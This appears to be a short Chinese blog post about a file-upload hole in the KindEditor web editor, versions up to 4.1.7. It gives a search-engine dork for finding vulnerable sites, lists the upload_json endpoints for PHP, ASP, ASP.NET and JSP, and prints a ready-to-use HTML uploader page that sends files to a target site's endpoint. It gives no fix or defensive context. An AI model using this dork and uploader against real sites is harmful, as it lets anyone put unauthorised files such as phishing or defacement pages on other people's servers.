漏洞描述
漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net
漏洞存在于小于等于kindeditor4.1.7编辑器中
关键字:
allinurl:/php/upload_json.php / .asp / .jsp
根本脚本语言自定义不同的上传地址,上传之前有必要验证文件upload_json.*的存在
/asp/upload_json.asp
/asp.net/upload_json.ashx
/jsp/upload_json.jsp
/php/upload_json.php
<html><head>
<title>Uploader By ICE</title>
<script src=”http://[Target]/kindeditor/kindeditor-min.js”></script>
<script>
KindEditor.ready(function(K) {
var uploadbutton = K.uploadbutton({
button : K(‘#uploadButton’)[0],
fieldName : ‘imgFile’,
url : ‘http://[Target]/kindeditor/php/upload_json.asp?dir=file‘,
afterUpload : function(data) {
if (data.error === 0) {
var url = K.formatUrl(data.url, ‘absolute’);
K(‘#url’).val(url);}
},
});
uploadbutton.fileBox.change(function(e) {
uploadbutton.submit();
});
});
</script></head><body>
<div class=”upload”>
<input class=”ke-input-text” type=”text” id=”url” value=”” readonly=”readonly” />
<input type=”button” id=”uploadButton” value=”Upload” />
</div>
</body>
</html>
其他常见编辑器漏洞可参考 https://www.lnmpweb.cn/archives/1318
Leave a Reply